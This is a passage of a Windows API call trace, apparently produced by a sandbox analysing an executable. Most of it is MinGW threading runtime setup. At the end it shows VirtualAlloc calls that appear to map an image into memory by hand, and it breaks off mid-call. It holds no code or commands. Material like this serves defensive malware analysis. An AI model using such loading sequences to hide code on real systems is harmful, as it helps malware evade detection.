0x6ab0c6c0 [0092.542] malloc (_Size=0x5f5e100) returned 0x2270020 [0103.969] strlen (_Str="use_fc_key") returned 0xa [0103.969] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x138 [0103.969] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0103.969] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.969] malloc (_Size=0x4) returned 0x6c1448 [0103.969] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAAaAAaaaaaAaAaaaAaaAaa") returned 0xc000 [0103.970] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x26ef58, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAAaAAaaaaaAaAaaaAaaAaa") returned 0x3a [0103.970] ReleaseMutex (hMutex=0x138) returned 1 [0103.970] CloseHandle (hObject=0x138) returned 1 [0103.970] strlen (_Str="sjlj_once") returned 0x9 [0103.970] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x138 [0103.971] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0103.971] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.971] malloc (_Size=0x4) returned 0x6c1458 [0103.971] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAAaAAaaaaaAaAaaaAaAAaa") returned 0xc001 [0103.971] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x26ef38, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAAaAAaaaaaAaAaaaAaAAaa") returned 0x39 [0103.971] ReleaseMutex (hMutex=0x138) returned 1 [0103.971] CloseHandle (hObject=0x138) returned 1 [0103.971] strlen (_Str="once_global_shmem") returned 0x11 [0103.971] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x138 [0103.971] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0103.971] FindAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.971] malloc (_Size=0x10) returned 0x6c1468 [0103.971] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAAaAAaaaaaAaAaaaAAaAaa") returned 0xc002 [0103.971] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x26eec8, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAAaAAaaaaaAaAaaaAAaAa") returned 0x40 [0103.972] ReleaseMutex (hMutex=0x138) returned 1 [0103.972] CloseHandle (hObject=0x138) returned 1 [0103.972] strlen (_Str="once_obj_shmem") returned 0xe [0103.972] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x138 [0103.972] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0103.972] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.972] malloc (_Size=0x4) returned 0x6c1480 [0103.972] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAAaAAaaaaaAaAaaAaaaaaa") returned 0xc003 [0103.972] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x26eed8, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAAaAAaaaaaAaAaaAaaaaa") returned 0x3d [0103.972] ReleaseMutex (hMutex=0x138) returned 1 [0103.972] CloseHandle (hObject=0x138) returned 1 [0103.972] calloc (_Count=0x1, _Size=0x10) returned 0x6c1490 [0103.973] strlen (_Str="mutex_global_shmem") returned 0x12 [0103.973] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x138 [0103.973] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0103.973] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.973] malloc (_Size=0x10) returned 0x6c27e8 [0103.973] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAAaAAaaaaAaaAAAAAAaAaa") returned 0xc004 [0103.973] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x26ee78, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAAaAAaaaaAaaAAAAAAaAa") returned 0x41 [0103.973] ReleaseMutex (hMutex=0x138) returned 1 [0103.973] CloseHandle (hObject=0x138) returned 1 [0103.973] calloc (_Count=0x1, _Size=0x1c) returned 0x6c2800 [0103.973] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x138 [0103.973] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0103.973] GetCurrentThreadId () returned 0xd9c [0103.973] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0103.974] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x134 [0103.974] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0103.974] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.974] malloc (_Size=0x4) returned 0x6c2828 [0103.974] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaaAaAaa") returned 0xc005 [0103.974] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x26ee98, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaaAaAa") returned 0x46 [0103.974] ReleaseMutex (hMutex=0x134) returned 1 [0103.974] CloseHandle (hObject=0x134) returned 1 [0103.974] calloc (_Count=0x1, _Size=0x10) returned 0x6c2838 [0103.974] calloc (_Count=0x1, _Size=0x1c) returned 0x6c2850 [0103.974] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0103.974] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0103.974] GetCurrentThreadId () returned 0xd9c [0103.974] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0103.974] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x13c [0103.974] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0103.975] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.975] malloc (_Size=0x4) returned 0x6c2878 [0103.975] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaAAAAaa") returned 0xc006 [0103.975] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x26ee58, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaAAAAa") returned 0x41 [0103.975] ReleaseMutex (hMutex=0x13c) returned 1 [0103.975] CloseHandle (hObject=0x13c) returned 1 [0103.975] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0103.975] CloseHandle (hObject=0x134) returned 1 [0103.975] free (_Block=0x6c2850) [0103.975] free (_Block=0x6c2838) [0103.975] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0103.975] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x134 [0103.975] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0103.975] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.975] malloc (_Size=0x4) returned 0x6c2838 [0103.976] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaaAAAaa") returned 0xc007 [0103.976] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x26ee78, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaaAAAa") returned 0x44 [0103.976] ReleaseMutex (hMutex=0x134) returned 1 [0103.976] CloseHandle (hObject=0x134) returned 1 [0103.976] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0103.976] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x134 [0103.976] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0103.976] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.976] malloc (_Size=0x10) returned 0x6c2848 [0103.976] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaAaaAaa") returned 0xc008 [0103.976] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x26ee08, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaAaaAa") returned 0x48 [0103.976] ReleaseMutex (hMutex=0x134) returned 1 [0103.976] CloseHandle (hObject=0x134) returned 1 [0103.976] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0103.976] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x134 [0103.976] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0103.977] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.977] malloc (_Size=0x4) returned 0x6c2860 [0103.977] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaAAaaaa") returned 0xc009 [0103.977] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x26ee08, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaaAAaaa") returned 0x45 [0103.977] ReleaseMutex (hMutex=0x134) returned 1 [0103.977] CloseHandle (hObject=0x134) returned 1 [0103.977] calloc (_Count=0x1, _Size=0x1c) returned 0x6c2888 [0103.977] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0103.977] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0103.977] GetCurrentThreadId () returned 0xd9c [0103.977] strlen (_Str="pthr_root_shmem") returned 0xf [0103.977] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x13c [0103.977] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0103.977] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.977] malloc (_Size=0x4) returned 0x6c28b0 [0103.977] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaAaAAaaa") returned 0xc00a [0103.978] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x26ee88, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAAaAAaaaaAaAaaaAaAAaa") returned 0x3e [0103.978] ReleaseMutex (hMutex=0x13c) returned 1 [0103.978] CloseHandle (hObject=0x13c) returned 1 [0103.978] calloc (_Count=0x1, _Size=0xc0) returned 0x6c28c0 [0103.978] strlen (_Str="idListCnt_shmem") returned 0xf [0103.978] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x13c [0103.978] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0103.978] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.978] malloc (_Size=0x4) returned 0x6c2988 [0103.978] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAAaAAaaaaAaAaaAAaaaAaa") returned 0xc00b [0103.978] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x26ee58, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAAaAAaaaaAaAaaAAaaaAa") returned 0x3e [0103.978] ReleaseMutex (hMutex=0x13c) returned 1 [0103.978] CloseHandle (hObject=0x13c) returned 1 [0103.978] strlen (_Str="idListMax_shmem") returned 0xf [0103.978] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x13c [0103.979] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0103.979] FindAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.979] malloc (_Size=0x4) returned 0x6c2998 [0103.979] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAAaAAaaaaAaAaaAAaaAAaa") returned 0xc00c [0103.979] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x26ee58, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAAaAAaaaaAaAaaAAaaAAa") returned 0x3e [0103.979] ReleaseMutex (hMutex=0x13c) returned 1 [0103.979] CloseHandle (hObject=0x13c) returned 1 [0103.979] malloc (_Size=0x80) returned 0x6c29a8 [0103.979] strlen (_Str="idList_shmem") returned 0xc [0103.979] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x13c [0103.979] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0103.979] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.979] malloc (_Size=0x4) returned 0x6c2a30 [0103.979] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaaAAaaa") returned 0xc00d [0103.979] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x26ee58, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaaAAaa") returned 0x3b [0103.979] ReleaseMutex (hMutex=0x13c) returned 1 [0103.980] CloseHandle (hObject=0x13c) returned 1 [0103.980] strlen (_Str="idListNextId_shmem") returned 0x12 [0103.980] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x13c [0103.980] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0103.980] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.980] malloc (_Size=0x4) returned 0x6c2a40 [0103.980] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaAaaaaa") returned 0xc00e [0103.980] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x26ee48, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaAaaaa") returned 0x41 [0103.980] ReleaseMutex (hMutex=0x13c) returned 1 [0103.980] CloseHandle (hObject=0x13c) returned 1 [0103.980] GetCurrentThreadId () returned 0xd9c [0103.980] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0103.980] GetCurrentThreadId () returned 0xd9c [0103.980] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0103.980] GetCurrentProcess () returned 0xffffffff [0103.981] GetCurrentThread () returned 0xfffffffe [0103.981] GetCurrentProcess () returned 0xffffffff [0103.981] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6c28d4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6c28d4*=0x140) returned 1 [0103.981] GetThreadPriority (hThread=0x140) returned 0 [0103.981] strlen (_Str="fc_key") returned 0x6 [0103.981] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x144 [0103.981] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0103.981] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.981] malloc (_Size=0x4) returned 0x6c2a50 [0103.981] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAAaAAaaaaAaAaAaaAaAaaa") returned 0xc00f [0103.981] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x26eed8, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAAaAAaaaaAaAaAaaAaAaaa") returned 0x36 [0103.981] ReleaseMutex (hMutex=0x144) returned 1 [0103.981] CloseHandle (hObject=0x144) returned 1 [0103.981] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0103.982] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x144 [0103.982] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0103.982] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.982] malloc (_Size=0x4) returned 0x6c2a60 [0103.982] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaAAaaaa") returned 0xc010 [0103.982] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x26ee98, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaAAaaa") returned 0x46 [0103.982] ReleaseMutex (hMutex=0x144) returned 1 [0103.982] CloseHandle (hObject=0x144) returned 1 [0103.982] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0103.982] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x144 [0103.982] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0103.983] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.983] malloc (_Size=0x4) returned 0x6c2a70 [0103.983] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaAAAaaa") returned 0xc011 [0103.983] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x26ee38, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAAaAAaaaaAaAaAaaAAAaa") returned 0x48 [0103.983] ReleaseMutex (hMutex=0x144) returned 1 [0103.983] CloseHandle (hObject=0x144) returned 1 [0103.983] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0103.983] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x144 [0103.983] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0103.983] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.983] malloc (_Size=0x10) returned 0x6c2a80 [0103.983] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAAaAAaaaaAaAaAaAaaaaaa") returned 0xc012 [0103.983] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x26ee18, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAAaAAaaaaAaAaAaAaaaaa") returned 0x47 [0103.983] ReleaseMutex (hMutex=0x144) returned 1 [0103.983] CloseHandle (hObject=0x144) returned 1 [0103.983] calloc (_Count=0x1, _Size=0x20) returned 0x6c2a98 [0103.984] calloc (_Count=0x1, _Size=0x1c) returned 0x6c2ac0 [0103.984] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x144 [0103.984] calloc (_Count=0x1, _Size=0x1c) returned 0x6c2ae8 [0103.984] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x148 [0103.984] calloc (_Count=0x1, _Size=0x6c) returned 0x6c2b10 [0103.984] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x14c [0103.984] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x150 [0103.984] strlen (_Str="rwl_global_shmem") returned 0x10 [0103.984] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x154 [0103.984] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0103.984] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.984] malloc (_Size=0x10) returned 0x6c2b88 [0103.984] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAaaaAaa") returned 0xc013 [0103.984] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x26ee38, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAaaaAa") returned 0x3f [0103.984] ReleaseMutex (hMutex=0x154) returned 1 [0103.984] CloseHandle (hObject=0x154) returned 1 [0103.985] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0103.985] GetCurrentThreadId () returned 0xd9c [0103.985] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0103.985] GetCurrentThreadId () returned 0xd9c [0103.985] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0103.985] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x154 [0103.985] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0103.985] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.985] malloc (_Size=0x4) returned 0x6c2ba0 [0103.985] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAaAaaaa") returned 0xc014 [0103.985] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x26ee98, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAaAaaa") returned 0x45 [0103.985] ReleaseMutex (hMutex=0x154) returned 1 [0103.985] CloseHandle (hObject=0x154) returned 1 [0103.985] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0103.986] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x154 [0103.986] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0103.986] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.986] malloc (_Size=0x4) returned 0x6c2bb0 [0103.986] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAaAAaaa") returned 0xc015 [0103.986] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x26ee98, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAaAAaa") returned 0x45 [0103.986] ReleaseMutex (hMutex=0x154) returned 1 [0103.986] CloseHandle (hObject=0x154) returned 1 [0103.986] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0103.986] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x154 [0103.986] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0103.986] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0103.986] malloc (_Size=0x4) returned 0x6c2bc0 [0103.988] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAAaaaaa") returned 0xc016 [0103.988] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x26ee98, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAAaAAaaaaAaAaAAAAaaaa") returned 0x46 [0103.988] ReleaseMutex (hMutex=0x154) returned 1 [0103.988] CloseHandle (hObject=0x154) returned 1 [0103.988] realloc (_Block=0x0, _Size=0x4) returned 0x6c2be8 [0103.988] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0103.988] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0103.988] ReleaseSemaphore (in: hSemaphore=0x138, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0103.988] CloseHandle (hObject=0x138) returned 1 [0103.988] free (_Block=0x6c2800) [0103.989] free (_Block=0x6c1490) [0103.989] GetLastError () returned 0x0 [0103.989] SetLastError (dwErrCode=0x0) [0103.989] GetLastError () returned 0x0 [0103.989] realloc (_Block=0x0, _Size=0x4) returned 0x6c2bf8 [0103.989] realloc (_Block=0x0, _Size=0x1) returned 0x6c2c08 [0103.989] SetLastError (dwErrCode=0x0) [0103.989] GetNativeSystemInfo (in: lpSystemInfo=0x26f040 | out: lpSystemInfo=0x26f040*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0103.989] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x10000000 [0103.989] GetProcessHeap () returned 0x4b0000 [0103.989] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x34) returned 0x52ad00 [0103.989] VirtualAlloc (lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0103.990] VirtualAlloc (lpAddress=0x10001000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000 [0104.118] VirtualAlloc (lpAddress=0x10024000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10024000 [0104.118] VirtualAlloc (lpAddress=0x10025000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10025000 [0104.118] VirtualAlloc 